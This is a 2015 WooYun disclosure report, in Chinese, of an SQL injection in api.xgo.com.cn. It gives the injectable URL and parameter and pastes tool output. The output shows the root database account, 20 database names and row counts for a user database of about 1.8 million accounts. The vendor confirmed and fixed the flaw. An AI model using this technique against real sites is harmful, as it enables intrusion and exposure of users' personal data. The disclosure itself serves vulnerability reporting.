当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132088

漏洞标题:汽车点评某重要站点SQL注入影响180W用户

相关厂商:xgo.com.cn

漏洞作者: 孤风

提交时间:2015-08-06 13:15

修复时间:2015-09-20 16:04

公开时间:2015-09-20 16:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

很重要的一个站,沦陷了后果很严重啊

详细说明:

站点

api.xgo.com.cn


旗下很多网站都是从这个站点获取数据,沦陷了就呵呵
注入点

http://api.xgo.com.cn/vote_arrnew.php?voteid=82


root用户

[12:52:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[12:52:43] [INFO] fetching database users
[12:52:43] [WARNING] reflective value(s) found and filtering out
[12:52:43] [INFO] the SQL query used returns 1 entries
[12:52:43] [INFO] retrieved: 'root'@'192.168.50.40'
database management system users [1]:
[*] 'root'@'192.168.50.40'


数据库

available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tips_admin
[*] xgo_topic
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu


180W用户

Database: xgo_user
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| user_relations | 6387754 |
| userinfo | 1869916 |
| user_active_log | 1677306 |
| user_checkimg | 1476298 |
| user_album_pic | 911875 |
| user_check_mobile_code | 878586 |
| user_online | 484162 |
| user_real | 471549 |
| user_extend | 471537 |
| user_mail_set | 471455 |
| user_message_2011 | 413961 |
| user_message_2014 | 394551 |
| user_register_log | 323516 |
| user_message_2013 | 255437 |
| user_message | 244635 |
| user_album_info | 231716 |
| user_score | 226902 |
| user_check_mail_code | 221728 |
| user_oltime_2015 | 190457 |
| user_message_2012 | 156266 |
| user_oltime_2011 | 125514 |
| user_oltime_2013 | 125226 |
| userinfo_test | 123526 |
| userinfo_new | 111228 |
| user_visitor | 107855 |
| user_oltime_2012 | 93920 |
| user_oltime_2014 | 88678 |
| x_invite_code | 39950 |
| z_login_api | 37313 |
| z_api_token | 16951 |
| tag_from_pic | 6339 |
| tag_from_user | 6339 |
| user_car_list_product_rel | 5094 |
| x_user_score | 5021 |
| x_userinfo_extend | 5021 |
| x_log_login_2013 | 4974 |
| audit_log | 4824 |
| x_check_mail_code | 4688 |
| user_comments | 3538 |
| x_log_send_mail_2013 | 3012 |
| user_tag2 | 2890 |
| x_register_history | 2632 |
| user_album_pic_tags | 2571 |
| user_carport | 2502 |
| china_city | 2489 |
| x_check_mobile_code | 1926 |
| x_user_car | 1397 |
| x_log_login_2015 | 1245 |
| user_interest_doc0 | 1232 |
| user_book_collection | 1178 |
| x_log_login_2014 | 1101 |
| x_log_send_mail_2014 | 1080 |
| whitelistuser | 1043 |
| x_log_modify_pwd_2013 | 989 |
| user_obj_comments | 974 |
| tag | 938 |
| user_car_list | 924 |
| user_tag_num | 812 |
| x_register | 758 |
| x_log_send_mail_2015 | 689 |
| checkimg_group | 585 |
| china_town | 580 |
| gift_present | 425 |
| tag_user9 | 405 |
| tag_user1 | 388 |
| tag_user8 | 361 |
| x_oauth_bind | 348 |
| user_owner_info | 346 |
| tag_user7 | 339 |
| tag_user3 | 320 |
| user_hide | 312 |
| x_log_modify_pwd_2014 | 292 |
| tag_user5 | 287 |
| tag_user6 | 279 |
| z_login_api_bark | 279 |
| tag_user4 | 244 |
| gift_buy | 235 |
| tag_user2 | 232 |
| x_log_modify_pwd_2015 | 156 |
| user_interest_doc17 | 152 |
| user_car_list_vote_1 | 87 |
| tag_user10 | 70 |
| user_interest_doc18 | 39 |
| china_province | 35 |
| user_tag1 | 35 |
| gift | 32 |
| user_active_cate | 30 |
| user_rank | 9 |
| gift_sort | 6 |
| user_modify_pw_log | 5 |
| x_user_verify | 2 |
| xgo_qq_session | 2 |
+---------------------------+---------+

漏洞证明:

见上,20rank不过分吧

修复方案:

过滤

版权声明:转载请注明来源 孤风@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-06 16:03

厂商回复:

已经修复

最新状态:

暂无


漏洞评价:

评论